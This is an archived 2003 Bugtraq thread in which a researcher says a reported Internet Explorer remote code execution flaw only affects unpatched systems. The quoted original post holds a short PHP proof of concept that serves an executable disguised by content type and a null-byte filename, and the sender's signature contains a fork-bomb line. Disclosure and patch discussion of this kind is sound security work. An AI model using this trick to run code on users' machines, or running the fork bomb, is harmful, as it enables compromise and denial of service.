RE: IE remote code execution

From: Thor Larholm (thor_at_pivx.com)
Date: 10/20/03

  • Next message: Immunix Security Team: "Immunix Secured OS 7+ fetchmail update"
    Date: Mon, 20 Oct 2003 11:42:35 -0700
    To: "Marcin Ulikowski" <r3b00t@tx.pl>, <bugtraq@securityfocus.com>
    
    

    A default Windows 98SE installation is several years behind in patches.

    This does not reproduce on any IE browser that has been patched the last
    year or so.

    If in doubt about your IE patch level apply the latest cumulative patch
    MS03-040, which can be found at

    http://www.microsoft.com/technet/security/bulletin/MS03-040.asp

    Regards
    Thor Larholm
    PivX Solutions, LLC - Senior Security Researcher
    http://pivx/com/larholm/ - Get our research, join our mailinglist

    -----Original Message-----
    From: Marcin Ulikowski [mailto:r3b00t@tx.pl]
    Sent: Saturday, October 18, 2003 3:16 PM
    To: bugtraq@securityfocus.com
    Subject: IE remote code execution

    This code can execute any code remotely using IE - as you can see very
    simple.

    // for IE 5, tested on default Windows 98SE installation
    <?php
    Header("Content-type: audio/midi");
    Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
    readfile("code.exe"); ?> <noscript>

    Here you have a demo:
    http://r3b00t.tx.pl/iexec5.php

    Can we expect more surprises like this one?

    --
    ------------------------------
    r3b00t ~ [http://r3b00t.tx.pl]
    just do main(){for(;;)fork();}
    ------------------------------
    

  • Next message: Immunix Security Team: "Immunix Secured OS 7+ fetchmail update"

    Relevant Pages

    • MSIE 6.0 will rollback during XP Pro Install -- Ref: MSIE may download and run programs automaticall
      ... Windows XP Pro Upgrade Version ... Windows XP Professional Upgrade Version 2002 (Windows XP Home Upgrade NOT ... Internet Explorer Version 6.0.2600.0000 Update Patches:; Q313675; ... system software installation process, effectively rolling the browser ...
      (Bugtraq)
    • Re: How to I Reformat my entire system?
      ... internet favorites, installable files you downloaded, installation keys for ... 60+ post-SP2 patches so you can come online only after being fully patched, ... You likely want Windows XP 32bit SP2 versions of the patch. ... the updates, how to integrate them into your own CD, etc.. ...
      (microsoft.public.windowsxp.help_and_support)
    • Re: No destination drive when trying to burn a DVD
      ... mem, all updates, last month I did a BU of my system using Nero 6 ... Windows updates and now when I run Nero I get a "no destination ... external media then do a clean installation of Windows XP, ... apply patches and now it doesn't work - so it must be the patches fault... ...
      (microsoft.public.windowsxp.hardware)
    • Re: Update XP
      ... > all security updates for a fresh installation of MS Windows ... (SP2 and the 40-ish patches afterwards.) ... better informed about your options when it comes to the Windows Updates. ...
      (microsoft.public.windowsxp.general)
    • Re: Update XP
      ... >> all security updates for a fresh installation of MS Windows ... > better informed about your options when it comes to the Windows Updates. ... > You can see the critical patches released for a given ...
      (microsoft.public.windowsxp.general)